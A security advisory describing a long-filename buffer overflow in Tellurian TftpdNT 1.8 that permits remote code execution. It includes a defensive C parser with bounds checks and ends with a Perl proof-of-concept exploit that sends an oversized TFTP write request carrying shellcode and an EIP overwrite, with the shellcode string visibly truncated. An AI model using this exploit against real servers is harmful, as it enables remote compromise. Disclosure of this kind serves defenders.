Security Vulnerability in Tellurian TftpdNT (Long Filename)


Tellurian TftpdNT is a TFTP server for Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to overflow an internal buffer and execute arbitrary code.


SecurITeam would like to thank STORM for finding this vulnerability.


Vulnerable systems:
 * TftpdNT version 1.8

Immune systems:
 * TftpdNT version 2.0

It is possible to cause a buffer overflow in the Tellurian TftpdNT product and overwrite the EIP pointer, which allows remote command execution.
The overflow occurs in the product’s parsing of the filename.
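
A server-side check that rejects the kind of oversized filename described above, as an added example that is not TftpdNT's code or the vendor's fix: a bounds-checked parser for TFTP read/write requests. The 255-byte filename limit, the accepted modes and all identifiers are assumptions.

```c
/* Bounds-checked parse of a TFTP RRQ/WRQ (RFC 1350): opcode, name\0, mode\0.
   Added example; names and TFTP_MAX_NAME are assumptions, not TftpdNT code. */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_MAX_NAME 255   /* assumed policy limit for the filename */
#define TFTP_MAX_MODE 8     /* strlen("netascii") */
enum tftp_err { TFTP_OK = 0, TFTP_SHORT, TFTP_BAD_OP, TFTP_NAME_LEN,
                TFTP_NAME_CHARS, TFTP_BAD_MODE };
struct tftp_req {
    uint16_t opcode;        /* 1 = RRQ, 2 = WRQ */
    char name[TFTP_MAX_NAME + 1], mode[TFTP_MAX_MODE + 1];
};

/* Copy one NUL-terminated field of at most max bytes from [p, end) into dst.
   Returns bytes consumed including the NUL, or 0 if it is too long or unterminated. */
static size_t take_field(const uint8_t *p, const uint8_t *end,
                         char *dst, size_t max)
{
    size_t avail = (size_t)(end - p);
    const uint8_t *nul = memchr(p, 0, avail < max + 1 ? avail : max + 1);
    if (nul == NULL) return 0;          /* never copy without a proven bound */
    memcpy(dst, p, (size_t)(nul - p) + 1);
    return (size_t)(nul - p) + 1;
}

enum tftp_err tftp_parse_request(const uint8_t *pkt, size_t len,
                                 struct tftp_req *out)
{
    if (len < 4) return TFTP_SHORT;
    out->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (out->opcode != 1 && out->opcode != 2) return TFTP_BAD_OP;
    const uint8_t *p = pkt + 2, *end = pkt + len;
    size_t used = take_field(p, end, out->name, TFTP_MAX_NAME);
    if (used < 2) return TFTP_NAME_LEN; /* empty, too long or unterminated */
    for (size_t i = 0; i + 1 < used; i++)
        if (!isprint((unsigned char)out->name[i])) return TFTP_NAME_CHARS;
    p += used;
    if (take_field(p, end, out->mode, TFTP_MAX_MODE) == 0) return TFTP_BAD_MODE;
    for (char *c = out->mode; *c; c++) *c = (char)tolower((unsigned char)*c);
    if (strcmp(out->mode, "netascii") != 0 && strcmp(out->mode, "octet") != 0)
        return TFTP_BAD_MODE;
    return TFTP_OK;
}
```

A request whose filename runs past the limit is rejected before any copy takes place, so the destination buffer size never depends on attacker-supplied length.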

Vendor status:
The vendor has been informed and fixed the issue within 24 hours. A new version is available on the web site.

#!/usr/bin/perl -w
# Tellurian TFTP Server buffer overflow vulnerability

use IO::Socket;
$host = '';
$port = '69';

$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33

$buf = "\x00\x02";
$buf .= "\x41" x (508-length($shellcode));
$buf .= $shellcode;
$buf .= "\x0F\x02\xC7"; # EIP
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";

print "Length: ", length($buf), "\n";

$socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error:
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Done\n";
